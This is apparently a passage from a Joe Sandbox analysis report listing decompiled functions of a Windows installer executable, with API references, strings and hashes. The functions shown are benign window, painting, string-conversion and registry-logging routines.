InterlockedExchange.KERNEL32(0049A660,00000001), ref: 0042E825

Strings

ChangeWindowMessageFilter, xrefs: 0042E804
user32.dll, xrefs: 0042E809

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressExchangeHandleInterlockedModuleProc
String ID: ChangeWindowMessageFilter$user32.dll
API String ID: 3478007392-2498399450
Opcode ID: 9e460d262acf90b746ec3bde9ef241f636213dcbfc0aff1b946f85e68eed8624
Instruction ID: af40488fdc13ea5f0a74c96e39c23783f5695669f32ba7161e5c7fcb4ab476bb
Opcode Fuzzy Hash: 9e460d262acf90b746ec3bde9ef241f636213dcbfc0aff1b946f85e68eed8624
Instruction Fuzzy Hash: B1E0ECB1741310AADE107B62AD8AF5B3654E724715F5C443BF181661E2C6BD0CA0C95E

Uniqueness

Uniqueness Score: -1.00%

Function 004762B4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19
libraryloaderthreadCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E004762B4(void* __ecx) {
				struct HWND__* _t1;
				_Unknown_base(*)()* _t2;
				DWORD* _t7;

				_t1 =  *0x49b07c; // 0x0
				_t2 = GetWindowThreadProcessId(_t1, _t7);
				if(_t2 != 0) {
					_t2 = GetProcAddress(GetModuleHandleA("user32.dll"), "AllowSetForegroundWindow");
					if(_t2 != 0) {
						_t2 =  *_t2( *_t7);
					}
				}
				return _t2;
			}

0x004762b6
0x004762bc
0x004762c3
0x004762d5
0x004762dc
0x004762e2
0x004762e2
0x004762dc
0x004762e5

APIs

GetWindowThreadProcessId.USER32(00000000), ref: 004762BC
GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,004763B3,0049B048,00000000), ref: 004762CF
GetProcAddress.KERNEL32(00000000,user32.dll), ref: 004762D5

Strings

AllowSetForegroundWindow, xrefs: 004762C5
user32.dll, xrefs: 004762CA

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressHandleModuleProcProcessThreadWindow
String ID: AllowSetForegroundWindow$user32.dll
API String ID: 1782028327-3855017861
Opcode ID: 7f98f43397a9b6b67b62abbb79cc0086ae238535ca0765badbb258860dac0eff
Instruction ID: fe4a12fdd5c34a6c44b2e884ece8a8160a9aff216a269c429a1620e81a41c3e3
Opcode Fuzzy Hash: 7f98f43397a9b6b67b62abbb79cc0086ae238535ca0765badbb258860dac0eff
Instruction Fuzzy Hash: 31D0A7B0200F01EAED10B3F15D4AD5B234ECD84714711C47B3814E6183CA3CD804893C

Uniqueness

Uniqueness Score: -1.00%

Function 0044ED7C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 16
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0044ED7C() {
				_Unknown_base(*)()* _t6;
				intOrPtr _t7;

				E00404A2C(0x4989c4);
				if( *0x49a034 == 0) {
					_t7 =  *0x49a020; // 0x44ed48
					 *0x49a77c = _t7;
					 *0x49a020 = E0044ED48;
				}
				E0044ED0C();
				E0044AC90();
				_t6 = GetProcAddress(GetModuleHandleA("user32.dll"), "NotifyWinEvent");
				 *0x49a768 = _t6;
				return _t6;
			}

0x0044ed81
0x0044ed8d
0x0044ed8f
0x0044ed94
0x0044ed99
0x0044ed99
0x0044eda3
0x0044eda8
0x0044edbd
0x0044edc2
0x0044edc7

APIs

GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00496EEE), ref: 0044EDB7
GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044EDBD

Strings

HD, xrefs: 0044ED8F
NotifyWinEvent, xrefs: 0044EDAD
user32.dll, xrefs: 0044EDB2

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: HD$NotifyWinEvent$user32.dll
API String ID: 1646373207-3826198660
Opcode ID: b962c4a0bdd04a3d8f0cee902d42f3f17fb110725d15459fbdf9d276febc4f36
Instruction ID: f7f1d492e6724cf617ef4c2160391edda5d29ed164744fb688b7ed0daf2a5a02
Opcode Fuzzy Hash: b962c4a0bdd04a3d8f0cee902d42f3f17fb110725d15459fbdf9d276febc4f36
Instruction Fuzzy Hash: BEE012F4E413019AFB40FFBB5947B192AA0BBA431DB04407FB40466192CB7C48208F5F

Uniqueness

Uniqueness Score: -1.00%

Function 00416C14 Relevance: 7.6, APIs: 5, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00416C14(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				struct tagPAINTSTRUCT _v84;
				intOrPtr _t54;
				void* _t63;
				struct HDC__* _t73;
				intOrPtr _t87;
				void* _t94;
				void* _t95;
				void* _t97;
				void* _t99;
				void* _t100;
				intOrPtr _t101;

				_t99 = _t100;
				_t101 = _t100 + 0xffffffb0;
				_v12 = __edx;
				_v8 = __eax;
				_t73 =  *(_v12 + 4);
				if(_t73 == 0) {
					_t73 = BeginPaint(E004181C8(_v8),  &_v84);
				}
				_push(_t99);
				_push(0x416d2d);
				_push( *[fs:ecx]);
				 *[fs:ecx] = _t101;
				if( *((intOrPtr*)(_v8 + 0xb0)) != 0) {
					_v20 = SaveDC(_t73);
					_v16 = 2;
					_t94 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xb0)) + 8)) - 1;
					if(_t94 >= 0) {
						_t95 = _t94 + 1;
						_t97 = 0;
						do {
							_t63 = E0040B424( *((intOrPtr*)(_v8 + 0xb0)), _t97);
							if( *((char*)(_t63 + 0x37)) != 0 || ( *(_t63 + 0x1c) & 0x00000010) != 0 && ( *(_t63 + 0x35) & 0x00000004) == 0) {
								if(( *(_t63 + 0x34) & 0x00000040) == 0) {
									goto L11;
								} else {
									_v16 = ExcludeClipRect(_t73,  *(_t63 + 0x24),  *(_t63 + 0x28),  *(_t63 + 0x24) +  *((intOrPtr*)(_t63 + 0x2c)),  *(_t63 + 0x28) +  *((intOrPtr*)(_t63 + 0x30)));
									if(_v16 != 1) {
										goto L11;
									}
								}
							} else {
								goto L11;
							}
							goto L12;
							L11:
							_t97 = _t97 + 1;
							_t95 = _t95 - 1;
						} while (_t95 != 0);
					}
					L12:
					if(_v16 != 1) {
						 *((intOrPtr*)( *_v8 + 0x70))();
					}
					RestoreDC(_t73, _v20);
				} else {
					 *((intOrPtr*)( *_v8 + 0x70))();
				}
				E00416D68(_v8, 0, _t73);
				_pop(_t87);
				 *[fs:eax] = _t87;
				_push(E00416D34);
				_t54 = _v12;
				if( *((intOrPtr*)(_t54 + 4)) == 0) {
					return EndPaint(E004181C8(_v8),  &_v84);
				}
				return _t54;
			}

0x00416c15
0x00416c17
0x00416c1d
0x00416c20
0x00416c26
0x00416c2b
0x00416c3f
0x00416c3f
0x00416c43
0x00416c44
0x00416c49
0x00416c4c
0x00416c59
0x00416c70
0x00416c73
0x00416c86
0x00416c89
0x00416c8b
0x00416c8c
0x00416c8e
0x00416c99
0x00416ca2
0x00416cb4
0x00000000
0x00416cb6
0x00416cd1
0x00416cd8
0x00000000
0x00000000
0x00416cd8
0x00000000
0x00000000
0x00000000
0x00000000
0x00416cda
0x00416cda
0x00416cdb
0x00416cdb
0x00416c8e
0x00416cde
0x00416ce2
0x00416ceb
0x00416ceb
0x00416cf3
0x00416c5b
0x00416c62
0x00416c62
0x00416cff
0x00416d06
0x00416d09
0x00416d0c
0x00416d11
0x00416d18
0x00000000
0x00416d27
0x00416d2c

APIs

BeginPaint.USER32(00000000,?), ref: 00416C3A
SaveDC.GDI32(?), ref: 00416C6B
ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D2D), ref: 00416CCC
RestoreDC.GDI32(?,?), ref: 00416CF3
EndPaint.USER32(00000000,?,00416D34,00000000,00416D2D), ref: 00416D27

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Paint$BeginClipExcludeRectRestoreSave
String ID:
API String ID: 3808407030-0
Opcode ID: 16ea6fe72d0a67e6752744a777096d4696b382ed41d4f8742cdf05d287066012
Instruction ID: 03e1e3e3319143dc4a968aea8456d553e58372997a22922a21284cc38e8d198a
Opcode Fuzzy Hash: 16ea6fe72d0a67e6752744a777096d4696b382ed41d4f8742cdf05d287066012
Instruction Fuzzy Hash: C0413D70A04204AFDB14DBA9C585FAAB7F8EF48314F1640AAE8459B362D778DD41CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004147E8 Relevance: 7.6, APIs: 5, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004147E8(intOrPtr* __eax, int __ecx, int __edx) {
				char _t46;
				signed char _t76;
				int _t83;
				intOrPtr* _t84;
				int _t85;
				int* _t87;

				 *_t87 = __ecx;
				_t83 = __edx;
				_t84 = __eax;
				if(__edx !=  *_t87) {
					if(( *(__eax + 0x1c) & 0x00000001) == 0) {
						_t76 =  *E004148F4; // 0x1f
					} else {
						_t76 =  *((intOrPtr*)(__eax + 0x5c));
					}
					if((_t76 & 0x00000001) == 0) {
						_t85 =  *(_t84 + 0x24);
					} else {
						_t85 = MulDiv( *(_t84 + 0x24), _t83,  *_t87);
					}
					if((_t76 & 0x00000002) == 0) {
						_t87[1] =  *(_t84 + 0x28);
					} else {
						_t87[1] = MulDiv( *(_t84 + 0x28), _t83,  *_t87);
					}
					if((_t76 & 0x00000004) == 0 || ( *(_t84 + 0x35) & 0x00000001) != 0) {
						_t87[2] =  *(_t84 + 0x2c);
					} else {
						_t87[2] = MulDiv( *(_t84 + 0x24) +  *(_t84 + 0x2c), _t83,  *_t87) - _t85;
					}
					if((_t76 & 0x00000008) == 0 || ( *(_t84 + 0x35) & 0x00000002) != 0) {
						_t87[3] =  *(_t84 + 0x30);
					} else {
						_t87[3] = MulDiv( *(_t84 + 0x28) +  *(_t84 + 0x30), _t83,  *_t87) - _t87[1];
					}
					 *((intOrPtr*)( *_t84 + 0x4c))(_t87[4], _t87[2]);
					if( *((char*)(_t84 + 0x39)) == 0 && (_t76 & 0x00000010) != 0) {
						E0041A38C( *((intOrPtr*)(_t84 + 0x44)), MulDiv(E0041A370( *((intOrPtr*)(_t84 + 0x44))), _t83,  *_t87));
					}
				}
				_t46 =  *0x4148f8; // 0x0
				 *((char*)(_t84 + 0x5c)) = _t46;
				return _t46;
			}

0x004147ef
0x004147f2
0x004147f4
0x004147f9
0x00414803
0x0041480a
0x00414805
0x00414805
0x00414805
0x00414813
0x00414827
0x00414815
0x00414823
0x00414823
0x0041482d
0x00414846
0x0041482f
0x0041483d
0x0041483d
0x0041484d
0x00414871
0x00414855
0x00414868
0x00414868
0x00414878
0x0041489e
0x00414880
0x00414895
0x00414895
0x004148b6
0x004148bd
0x004148dd
0x004148dd
0x004148bd
0x004148e2
0x004148e7
0x004148f1

APIs

MulDiv.KERNEL32(?,?,?), ref: 0041481E
MulDiv.KERNEL32(?,?,?), ref: 00414838
MulDiv.KERNEL32(?,?,?), ref: 00414861
MulDiv.KERNEL32(?,?,?), ref: 0041488C
MulDiv.KERNEL32(00000000,?,00000000), ref: 004148D4

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e6edf728b0c42de24ff2e528c1653778a2220952e7f02e6982977a2359f8597
Instruction ID: 443b87a0ee2644abb9360fba34c74d55fcd0368eb1eab09e5f4fbf2613e6a921
Opcode Fuzzy Hash: 2e6edf728b0c42de24ff2e528c1653778a2220952e7f02e6982977a2359f8597
Instruction Fuzzy Hash: 0E311E74604780AFC320EF69C984BABB7E8AF89714F04891EF9D5C7751C638EC808B19

Uniqueness

Uniqueness Score: -1.00%

Function 004297B4 Relevance: 7.6, APIs: 5, Instructions: 83
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E004297B4(void* __eax, void* __ebx, intOrPtr __ecx, int __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v12;
				long _t27;
				long _t34;
				int _t42;
				int _t43;
				intOrPtr _t50;
				int _t54;
				void* _t57;
				void* _t60;

				_v12 = 0;
				_v8 = __ecx;
				_t54 = __edx;
				_t57 = __eax;
				_push(_t60);
				_push(0x42989f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t60 + 0xfffffff8;
				if(__edx >= 0) {
					_t42 = SendMessageA(E004181C8( *((intOrPtr*)(__eax + 8))), 0xbb, __edx, 0);
					if(_t42 < 0) {
						_t43 = SendMessageA(E004181C8( *((intOrPtr*)(_t57 + 8))), 0xbb, _t54 - 1, 0);
						if(_t43 >= 0) {
							_t27 = SendMessageA(E004181C8( *((intOrPtr*)(_t57 + 8))), 0xc1, _t43, 0);
							if(_t27 != 0) {
								_t42 = _t43 + _t27;
								E004035C0( &_v12, _v8, 0x4298b8);
								goto L6;
							}
						}
					} else {
						E004035C0( &_v12, 0x4298b8, _v8);
						L6:
						SendMessageA(E004181C8( *((intOrPtr*)(_t57 + 8))), 0xb1, _t42, _t42);
						_t34 = E00403738(_v12);
						SendMessageA(E004181C8( *((intOrPtr*)(_t57 + 8))), 0xc2, 0, _t34);
					}
				}
				_pop(_t50);
				 *[fs:eax] = _t50;
				_push(0x4298a6);
				return E00403400( &_v12);
			}

0x004297bf
0x004297c2
0x004297c5
0x004297c7
0x004297cb
0x004297cc
0x004297d1
0x004297d4
0x004297d9
0x004297f5
0x004297f9
0x00429824
0x00429828
0x0042983b
0x00429842
0x00429844
0x00429851
0x00000000
0x00429851
0x00429842
0x004297fb
0x00429806
0x00429856
0x00429866
0x0042986e
0x00429884
0x00429884
0x004297f9
0x0042988b
0x0042988e
0x00429891
0x0042989e

APIs

SendMessageA.USER32 ref: 004297F0
SendMessageA.USER32 ref: 0042981F
SendMessageA.USER32 ref: 0042983B
SendMessageA.USER32 ref: 00429866
SendMessageA.USER32 ref: 00429884

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: eae5639fdffc76e1948b0af5ebd5d3c99bde8b279a1f3fee593deda924590c9e
Instruction ID: 383ba272c364ba55b3c4c944082bb2ae4011b1553e559178bd08082a49e480ad
Opcode Fuzzy Hash: eae5639fdffc76e1948b0af5ebd5d3c99bde8b279a1f3fee593deda924590c9e
Instruction Fuzzy Hash: CA21AF707507147AE710BB66CC82F8B7AACEB42718F94043EB901BB2D2DB799D41826C

Uniqueness

Uniqueness Score: -1.00%

Function 0041BBA0 Relevance: 7.6, APIs: 5, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E0041BBA0(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr* __edx, void* __esi, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				int _v28;
				char _v32;
				signed int _t51;
				intOrPtr _t52;
				signed int _t55;
				intOrPtr* _t65;
				intOrPtr _t85;
				signed int _t87;
				void* _t89;
				void* _t90;
				intOrPtr _t91;

				_t89 = _t90;
				_t91 = _t90 + 0xffffffe4;
				_v12 = __ecx;
				_t65 = __edx;
				_v8 = __eax;
				_v32 = GetSystemMetrics(0xb);
				_v28 = GetSystemMetrics(0xc);
				 *(_v8 + 8) =  *(_v8 + 8) >> 1;
				 *(_v8 + 0x14) = E0041BB8C( *(_v8 + 4) * ( *(_v8 + 0xe) & 0x0000ffff)) *  *(_v8 + 8);
				_t51 = E0041B4D0( *(_v8 + 0xe));
				_t87 = _t51;
				_push(0);
				L00405F14();
				_v20 = _t51;
				if(_v20 == 0) {
					E0041B37C();
				}
				_push(_t89);
				_push(0x41bd65);
				_push( *[fs:edx]);
				 *[fs:edx] = _t91;
				_t52 = _v8;
				_v24 = _t52 + 0x28 + (_t87 << 2);
				_push(0);
				_push(_t52);
				_push(_v24);
				_push(4);
				_push(_v8);
				_t55 = _v20;
				_push(_t55);
				L00405BC4();
				_v16 = _t55;
				if(_v16 == 0) {
					E0041B37C();
				}
				_push(_t89);
				_push(0x41bc88);
				_push( *[fs:eax]);
				 *[fs:eax] = _t91;
				 *_t65 = E0041B394(_v16, 0,  &_v32);
				_pop(_t85);
				 *[fs:eax] = _t85;
				_push(E0041BC8F);
				return DeleteObject(_v16);
			}

0x0041bba1
0x0041bba3
0x0041bba8
0x0041bbab
0x0041bbad
0x0041bbb7
0x0041bbc1
0x0041bbc7
0x0041bbe7
0x0041bbf1
0x0041bbf6
0x0041bbf8
0x0041bbfa
0x0041bbff
0x0041bc06
0x0041bc08
0x0041bc08
0x0041bc0f
0x0041bc10
0x0041bc15
0x0041bc18
0x0041bc1b
0x0041bc2a
0x0041bc2d
0x0041bc32
0x0041bc36
0x0041bc37
0x0041bc3c
0x0041bc3d
0x0041bc40
0x0041bc41
0x0041bc46
0x0041bc4d
0x0041bc4f
0x0041bc4f
0x0041bc56
0x0041bc57
0x0041bc5c
0x0041bc5f
0x0041bc6f
0x0041bc73
0x0041bc76
0x0041bc79
0x0041bc87

APIs

GetSystemMetrics.USER32 ref: 0041BBB2
GetSystemMetrics.USER32 ref: 0041BBBC
740BAC50.USER32(00000000,00000001,0000000C,0000000B,?,?), ref: 0041BBFA
740BA7F0.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BD65,?,00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC41
DeleteObject.GDI32(00000000), ref: 0041BC82

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: MetricsSystem$DeleteObject
String ID:
API String ID: 4263548647-0
Opcode ID: 632a9429606b09a093a7d6e7127f2bc34ea9512a51f79ed98bc04dcc40fefe79
Instruction ID: cd8e556df717dd5b5400d21712ca2c64c6068fedc09be683e35ab3f3aea47ce2
Opcode Fuzzy Hash: 632a9429606b09a093a7d6e7127f2bc34ea9512a51f79ed98bc04dcc40fefe79
Instruction Fuzzy Hash: 74315274E00609EFDB04DFA5C941AAEF7F5EB48704F11856AF510AB381D7789E80DB94

Uniqueness

Uniqueness Score: -1.00%

Function 004721D4 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E004721D4(char __eax, void* __ebx, intOrPtr __ecx, char __edx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v5;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _t30;
				signed int _t34;
				intOrPtr _t56;
				intOrPtr _t64;
				void* _t69;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v28 = 0;
				_t64 = __ecx;
				_t66 = __edx;
				_v5 = __eax;
				_t46 = _a4;
				_push(_t69);
				_push(0x4722a8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t69 + 0xffffffe0;
				if(_a4 != 0xffffffff) {
					E00452910(__edx,  &_v28);
					_v24 = _v28;
					_v20 = 0xb;
					_v16 = _t64;
					_v12 = 0xb;
					E00456D64("Setting permissions on registry key: %s\\%s", _t46, 1,  &_v24, _t64, __edx);
					_t30 =  *0x49b2ec; // 0x22679e8
					_t47 = E0040B424(_t30, _t46);
					_t34 = E00403574( *_t31);
					asm("cdq");
					_t53 = _t64;
					if(E0045C3E8(_v5, _t47, _t64, __edx, _t64, __edx, _t34 / 0x14,  *_t47) == 0) {
						if(GetLastError() != 2) {
							_v36 = GetLastError();
							_v32 = 0;
							E00456D64("Failed to set permissions on registry key (%d).", _t47, 0,  &_v36, _t64, _t66);
						} else {
							E00456B58("Could not set permissions on the registry key because it currently does not exist.", _t47, _t53, _t64, _t66);
						}
					}
				}
				_pop(_t56);
				 *[fs:eax] = _t56;
				_push(0x4722af);
				return E00403400( &_v28);
			}

0x004721da
0x004721db
0x004721dc
0x004721df
0x004721e2
0x004721e4
0x004721e6
0x004721e9
0x004721ee
0x004721ef
0x004721f4
0x004721f7
0x004721fd
0x00472208
0x00472210
0x00472213
0x00472217
0x0047221a
0x0047222b
0x00472232
0x0047223c
0x00472243
0x0047224d
0x00472251
0x0047225f
0x00472269
0x0047227c
0x0047227f
0x0047228d
0x0047226b
0x00472270
0x00472270
0x00472269
0x0047225f
0x00472294
0x00472297
0x0047229a
0x004722a7

APIs

Part of subcall function 0045C3E8: SetLastError.KERNEL32(00000057,00000000,0045C4B4,?,?,?,?,00000000), ref: 0045C453

GetLastError.KERNEL32(00000000,00000000,00000000,004722A8,?,?,0049B16C,00000000), ref: 00472261
GetLastError.KERNEL32(00000000,00000000,00000000,004722A8,?,?,0049B16C,00000000), ref: 00472277

Strings

Could not set permissions on the registry key because it currently does not exist., xrefs: 0047226B
Failed to set permissions on registry key (%d)., xrefs: 00472288
Setting permissions on registry key: %s\%s, xrefs: 00472226

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ErrorLast
String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
API String ID: 1452528299-4018462623
Opcode ID: 5ffe4915ef0b184d08f693b1b200ca5568aff1971bc7f6ea53270cd9dcf18fbc
Instruction ID: d47a70203f190fd58beeafa22ec928943bdfb9c892880def146f4847ff09200b
Opcode Fuzzy Hash: 5ffe4915ef0b184d08f693b1b200ca5568aff1971bc7f6ea53270cd9dcf18fbc
Instruction Fuzzy Hash: B421C870A046449FCB10DBAAD9816EEBBF8EF49314F50817BE408E7393D7B89905C769

Uniqueness

Uniqueness Score: -1.00%

Function 00403CA4 Relevance: 7.6, APIs: 5, Instructions: 55
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00403CA4(char* __eax) {
				short _v2064;
				short* _t8;
				short* _t15;
				char* _t16;
				short* _t17;
				int _t18;
				int _t19;

				_t16 = __eax;
				_t18 = E00403574(__eax);
				if(E00403574(_t16) >= 0x400) {
					_t8 = MultiByteToWideChar(0, 0, _t16, _t18, 0, 0);
					_t19 = _t8;
					_push(_t19);
					_push(0);
					L004012C8();
					_t17 = _t8;
					MultiByteToWideChar(0, 0, _t16, _t18, _t17, _t19);
				} else {
					_push(MultiByteToWideChar(0, 0, E00403738(_t16), _t18,  &_v2064, 0x400));
					_t15 =  &_v2064;
					_push(_t15);
					L004012C8();
					_t17 = _t15;
				}
				return _t17;
			}

0x00403cae
0x00403cb7
0x00403cc5
0x00403cfc
0x00403d01
0x00403d03
0x00403d04
0x00403d06
0x00403d0b
0x00403d15
0x00403cc7
0x00403ce3
0x00403ce4
0x00403ce8
0x00403ce9
0x00403cee
0x00403cee
0x00403d26

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ByteCharMultiWide$AllocString
String ID:
API String ID: 262959230-0
Opcode ID: 40462338183cbb1311dfebad793113c38e9d5a114e6fdb44db9785adf1e72679
Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
Opcode Fuzzy Hash: 40462338183cbb1311dfebad793113c38e9d5a114e6fdb44db9785adf1e72679
Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D

Uniqueness

Uniqueness Score: -1.00%

Function 004143C8 Relevance: 7.6, APIs: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E004143C8(intOrPtr* __eax, void* __ecx, signed int __edx, void* __eflags) {
				void* _v4;
				intOrPtr _v7;
				char _v19;
				intOrPtr _v36;
				char _v47;
